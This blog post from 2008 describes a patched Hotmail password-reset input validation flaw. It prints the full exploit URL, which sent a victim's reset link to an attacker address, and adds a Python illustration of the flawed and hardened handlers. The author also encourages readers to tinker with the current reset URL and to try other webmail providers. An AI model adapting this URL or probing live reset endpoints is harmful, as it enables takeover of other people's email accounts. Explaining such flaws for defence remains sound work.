May 16, 2008

05.16.08 by justy

I’ve been doing some reading on input validation attacks to gain illegal access to email accounts. One example that I read about involved Microsoft Corporation’s Hotmail and was called the Reset Password Input Validation attack. Basically, it would allow the attacker to reset the password of any victim the attacker chose without any interruptions, such as the security question. The attacker could execute the attack by copying and pasting this URL into the address bar:

https://register.passport.net/emailpwdreset.srf?1c=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

Of course, victim@hotmail.com is the account whose password will be reset. attacker@attacker.com is an account the attacker sets up, to which the victim’s password reset link will be sent. After the above URL is entered in the address bar, an email will be sent to the attacker’s account with the link to reset the victim’s password. Can you believe something as simple as this URL string can allow access to sensitive information, even bypassing the security question? Pretty neat loophole. Of course, this loophole has been closed, but if you look at the email password reset URL now from Hotmail, and play around with it a bit, you can figure it out :p I am sure the same can be done with other Web-based email service providers.
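To make the flaw concrete, here is an added example (not from the original post and not Microsoft's code) that models a reset handler trusting the `prefem` parameter, next to a version that keeps the destination and the security-question state on the server. The account store, function names and recovery address are hypothetical, and how the real backend worked is an assumption based on the behaviour described above.

```python
from urllib.parse import parse_qs

# Constructed account store: recovery address on file, plus whether the
# security question was answered in this server-side session (hypothetical).
ACCOUNTS = {
    "victim@hotmail.com": {"recovery": "victim-alt@example.org",
                           "question_passed": False},
}

def parse(query):
    """Flatten a query string to single values, stripping stray whitespace."""
    pairs = parse_qs(query, keep_blank_values=True)
    return {k.strip(): v[0].strip() for k, v in pairs.items()}

def reset_recipient_vulnerable(query):
    """Flawed pattern: the request decides where the reset link is mailed."""
    p = parse(query)
    if p.get("em") not in ACCOUNTS:
        return None
    # Bug: 'prefem' is client input, yet it is trusted as the destination,
    # and no check confirms the security question was answered.
    return p.get("prefem") or ACCOUNTS[p["em"]]["recovery"]

def reset_recipient_hardened(query):
    """Fixed pattern: destination and verification state live server-side."""
    p = parse(query)
    account = ACCOUNTS.get(p.get("em"))
    if account is None or not account["question_passed"]:
        return None  # unknown account, or security question not yet passed
    # Any client-supplied 'prefem' is ignored; only the address on file is used.
    return account["recovery"]

# Constructed request reusing the parameter names from the URL in the post.
SAMPLE = "em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1"

if __name__ == "__main__":
    print("vulnerable ->", reset_recipient_vulnerable(SAMPLE))
    print("hardened   ->", reset_recipient_hardened(SAMPLE))
```

The hardened version returns nothing until the server itself has recorded a passed security question, and even then it mails only the address already on file.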


© 2010-2017 She-Geeks.com All Rights Reserved